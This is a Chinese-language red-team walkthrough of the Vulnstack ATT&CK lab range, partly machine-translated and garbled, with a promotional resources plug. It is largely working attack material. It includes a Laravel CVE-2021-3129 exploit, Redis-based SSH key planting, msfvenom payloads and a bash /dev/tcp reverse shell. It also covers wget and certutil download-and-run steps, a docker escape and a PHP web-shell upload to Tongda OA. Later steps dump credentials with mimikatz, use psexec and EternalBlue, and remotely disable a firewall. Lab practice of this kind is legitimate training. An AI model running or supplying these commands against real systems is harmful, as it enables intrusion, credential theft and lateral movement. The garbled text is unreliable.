涉及的知识点:1。WEB安全-漏洞发现和利用
2.系统安全-特权提升(漏洞配置逃逸)
3.内部网安全-横向移动(密码传递系统漏洞)
练习-ATTCK练习系列-红队评估环境下载:
http://vulnstack.qiyuanxuetang.net/vuln/detail/9/
资源的利用:
https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
https://github.com/briskets/CVE-2021-3493
https://blog.csdn.net/szgyunyun/article/details/107104288
请参见WP:
https://www.freebuf.com/articles/network/264560.html
涉及的技术:
1.漏洞搜索和利用2。Laravel调试模式RCE (CVE-2021-3129)漏洞利用3。码头逃生4。访问OA v11.3漏洞利用5。Linux环境变量授权6。Redis未授权访问漏洞7。Linux sudo特权提升(CVE-2021-3156)漏洞利用8。SSH使用键9。Windows NetLogon域权限提升(CVE-2020-1472)漏洞10。MS14-068漏洞利用服务配置。射击场的每台主机都在运行相应的服务,没有自启动功能。如果您关闭目标,当您重新启动它时,您需要同相。
应该在主机上启动无人机服务:
DMZ区的Ubuntu需要启动nginx服务:(web 1)1 sudoredis-server/etc/redis . conf 2 sudo/usr/sbin/nginx-c/etc/nginx/ngx . conf 3 sudo iptables-f第二层网络的Ubuntu需要启动docker容器:(web2) 1sudo服务docker start 2 sudo docker start 8 e 172820 AC 78第三层网络的Windows 7 (PC 1)需要启动,通达OA:1c 3360 \ myoa \ bin \ autoconfig.exe用户信息域的用户账号和密码如下:
管理员:whoami 2021 whoami:whoami 2021 bunny:bunny 2021 moretz:moretz 2021 Ubuntu 1:web:web 2021
Ubuntu 2:ubuntu:ubuntu
通达账户:管理员:admin657260
【所有资源关注我,私信回复“资讯”获取一个】
1、网络安全学习路线
2.电子书(白帽子)
3.安全工厂内部视频
4.100份src文件
5.常见的安全面试问题
6.ctf大赛经典标题解析
7.完整套件
8.应急响应说明
Kali打开ssh服务/etc/init.d/ssh启动xshell连接22端口与kali的ip。
渗透过程1。用kali扫描web1的外网端口(这里是46.160,Kali是46.158的地址)
nmap T4 sC sV 192 . 168 . 46 . 160
2.如果ip地址的端口81是开放的,则判断laravel被利用漏洞。
端口81: laravel有最新漏洞Python Laravel-CVE-2021-3129-exp . py 3358目标地址https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP项目地址3。使用哥斯拉工具连接成功上传的后门,
将有效载荷和加密器改为php的。
4.上线前,先判断对方的建筑体系。这样的出现意味着对方使用了docker来建造,那么接下来要考虑的就是如何让docker逃脱。这里上传冰蝎的木马使用冰蝎,因为我个人喜欢冰蝎的工具。可以上传其他后门,用蚂蚁剑和菜刀连接。
5.在这里,我们将web权限反弹给msf是不成功的。
一个是:因为对面的放大器会是8
1端口代理到52.20:8000端口上,这里肯定是连接不通的,因为我们的msf主机和对方的52网段的不出网机子不通6…所以我们入侵该主机并不能造成太大的威胁,借此我们要入侵web1的其他端口(kali扫描全部端口)扫到了6379的端口redis
nmap -T4 -sC -sV -p1-65535 192.168.xx.xxx
7.Ubuntu 1 DMZ渗透 redis未授权判断如果进入就代表有redis未授权(kali运行)
redis-cli -h 192.168.xx.xxxxx
7.1Redis未授权访问-ssh密匙 生成公钥(kali 上执行)
ssh-keygen -t rsa
7.2将公钥导入1.txt文件
echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt
7.3把1.txt文件内容写入目标主机的redis缓冲中
cat 1.txt | redis-cli -h 192.168.46.160(web主机) -p 6379(redis端口) -x set hello
7.4设置redis的备份路径为/root/.ssh/
config set dir /root/.ssh
7.5设置保存文件名为authorized_keys
config set dbfilename authorized_keys
7.6将数据保存在目标服务器硬盘上
save
7.7连接web1上的主机
ssh root@192.168.46.160
7.8获取web1的主机
8.因为连接到web1的主机,所以这里生成正向反向的后门都可以,我这里生成的是反向连接的后门
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.46.158 lport=6666 -f elf -o p1.elf
9.在将生成的后门放到刚刚连接到的web1的文件下
10.在用redis未授权访问的web1下载这个后门
wget http://192.168.46.160:81/p1.elf
11.在这个后门执行前,kali上要启用msf的监听模块
msfconsole 开启msfuse exploit/multi/handler 使用监听模块set payload linux/x64/meterpreter/reverse_tcp 设置刚刚生成后门的模块set lhost 192.168.46.158 设置ipset lport 6666 设置端口exploit 攻击
12.redis未授权访问的主机执行后门代码
!
run get_local_subnets 获取本地路由
run autoroute -p 查询本地路由
run post/multi/manage/autoroute 得到本地路由
!
use auxiliary/scanner/discovery/udp_probe 使用扫描模块
show options 展示选项
set rhosts 192.168.52.1-255 设置主机范围
set threads 10 设置线程
run 运行
!
16.通过对文件反编译或源代码查看,覆盖其执行环境变量,直接让其执行指定程序获取权限
cd /home/jobs./shellchmod 777 pscp /bin/bash /tmp/ps
17.因为环境变量问题所以我们将这个二层网络的主机反弹到一层网络主机上面所以在创建一个kali会话连接到第一层的网络主机上面,设置nc将二层网络主机的权限反弹到一层主机上面
nc -lvp 1234
18.将web权限反弹到第一层主机上
bash -c 'exec bash -i >& /dev/tcp/192.168.52.10/1234 0>&1'
19.添加环境变量
export PATH=/tmp:$PATH 添加环境变量echo $PATH 查看环境变量
20.在来使用shell提升权限
./shellid 查看权限
21.kali生成正向连接的后门由此来连接
msfvenom -p linux/x64/meterpreter/bind_tcp lport=7777 -f elf -o p2.elf 生成正向连接的后门
22.在将这个后门放到冰蝎连接上的web主机上面
23.在来使用kali的msf监听这个后门
use exploit/multi/handlerset payload linux/x64/meterpreter/bind_tcp show optionsset lport 7777set rhost 192.168.52.20 主机连接对方的ip地址exploit
然后在提权的机器上运行后门发现不成功,这就是涉及到前面所提及到的dokcer(为了确保能木马能运行,在真实机上运行试验一下验证)25.docker逃逸在那台提权上的主机上进行逃逸
fdisk -l 查看磁盘文件ls /dev 查看设备文件cd /mkdir hellomount /dev/sda1 /hellols /hello覆盖密匙:cp -avx /hello/home/ubuntu/.ssh/id_rsa.pub /hello/home/ubuntu/.ssh/authorized_keys -avx将权限也一起复制echo > /hello/home/ubuntu/.ssh/authorized_keys 清空authorized_keys文件echo '26步骤生成的密钥' > /hello/home/ubuntu/.ssh/authorized_keys 将ssh秘钥写入
26.pc1上覆盖密钥(重新建立一个kali的终端)
ssh root@192.168.46.160 重新连接kalicat hello.pub 查看密钥ssh-keygen -f hello 生成密钥chmod 600 hello 给予权限lscat hello.pub
27.25步骤写入了密钥就可以连接52.20的主机(刚刚创建密钥的主机上连接)
ssh -i hello ubuntu@192.168.52.20
28.在来运行该木马
29.然后建立的msf的监听就能接受到会话
30.然后再来进入到ubuntu的会话中查看路由地址,就能添加到93的主机地址
session 4run get_local_subnets
run autoroute -prun post/multi/manage/autoroute31.现在我们已经拿下了20和10的主机,我们要拿下30的主机,我们要使用nmap来扫描ip地址的服务,虽然我们这台msf有52网段的ip路由,但是nmap不是msf内置的工具,所以我们可以设置一个代理来使用nmap扫描工具。
32.这里我使用msf自带的扫描模块
use auxiliary/scanner/portscan/tcpshow optionsset rhosts 192.168.52.30set threads 10exploit
33.然后在用kali机连接到这个oa系统,前提win7上打开了oa系统,kali的浏览器上设置代理,使用burpsuite抓包
!
Host: xxxx:xx
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: /
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name=“UPLOAD_MODE”
2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name=“P”
123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name=“DEST_UID”
1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name=“ATTACHMENT”; filename=“jpg”
Content-Type: image/jpeg
<?php $command=$_POST<'cmd'>; $wsh = new COM('WScript.shell'); $exec = $wsh->exec("cmd /c ".$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?>
------WebKitFormBoundarypyfBh1YB4pV8McGB–
34.6在来使用文件包含来 命令执行POST /ispirit/interface/gateway.php HTTP/1.1
Host: ip:端口
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.21.0
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
json={“url”:"/general/…/…/attach/im/图片路径"}&cmd=whoami
34.7发现可以命令执行,再来下载一个后门代码,前提是要生成一个windows后门木马,将木马放到web1的目录上```msfvenom -p windows/meterpreter/bind_tcp LPORT=7777 -f exe > w7.exe
34.8再来下载这个木马,执行我们的上线certutil -urlcache -split -f http://192.168.52.10:81/w7.exe c:/w7.exe
34.9使用木马前监听这个后门use exploit/multi/handlerset payload windows/meterpreter/bind_tcpset rhost 192.168.52.30set lport 7777exploit
34.10 再来使用这个木马执行上线操作!
37.然后在利用msf自带的扫描模块扫描
backgrounduse auxiliary/scanner/discover/udp_proeshow optionsset rhosts 192.168.93.1-50run
38.发现对方开放的ip地址和端口
第一种情况是关闭了防火墙可直接执行上线操作39.其一:利用ms17010
use auxiliary/scanner/smb/smb_ms17_010 扫描是否有ms17010漏洞show optionsset rhosts 192.168.93.20-30 扫描20-30网段exploit
40.发现有两台主机可以利用
41.其二:使用mimikatz来攻击
sessionssessions 5load kiwi 载入mimikatz
42.如果这里提示x32不能执行x64,那就要移植进程
kiwi_cmd sekurlsa::logonpasswords 获取账号密码
43.先执行ps命令获取一个x64的system权限进程
psmigrate 4012 移植4012进程
44.再来执行刚刚的命令
kiwi_cmd sekurlsa::logonpasswords 获取账号密码
45.获取到administartor账号密码就来利用msf的psexec模块
backgrounduse exploit/windows/smb/psexecset payload windows/meterpreter/bind_tcp 改为正向连接set rhost 192.168.93.30 设置主机show optionsset smbuser 获取到的administrator账号 设置账号set smbpass 获取到的密码 设置密码exploit
46.其三:利用smb的ms17010的psexec的模块
use exploit/windows/smb/ms17_010_psexec 使用模块set payload windows/meterpreter/bind_tcp 设置正向连接set rhost 192.168.93.40 设置ip
开启防火墙47.这就是开启了防火墙,攻击能成功但是反弹不了会话
48.首先建立session
sessions 5
49.返回shell终端
!
sc \192.168.93.30 create unablefirewall binpath= “netsh advfirewall set allprofiles state off”
sc \192.168.93.30 start unablefirewall
!
exploit
!
use exploit/windows/smb/ms17_010_eternalblue
show options
set payload windows/x64/meterpreter/bind_tcp 改为正向连接
set rhost 192.168.93.40
run
(https://img-blog.csdnimg.cn/img_convert/0242eb1ad9dbf46d9763c460aaeb2111.png)>(https://xzfile.aliyuncs.com/media/upload/picture/20220129170244-390ed014-80e2-1.png)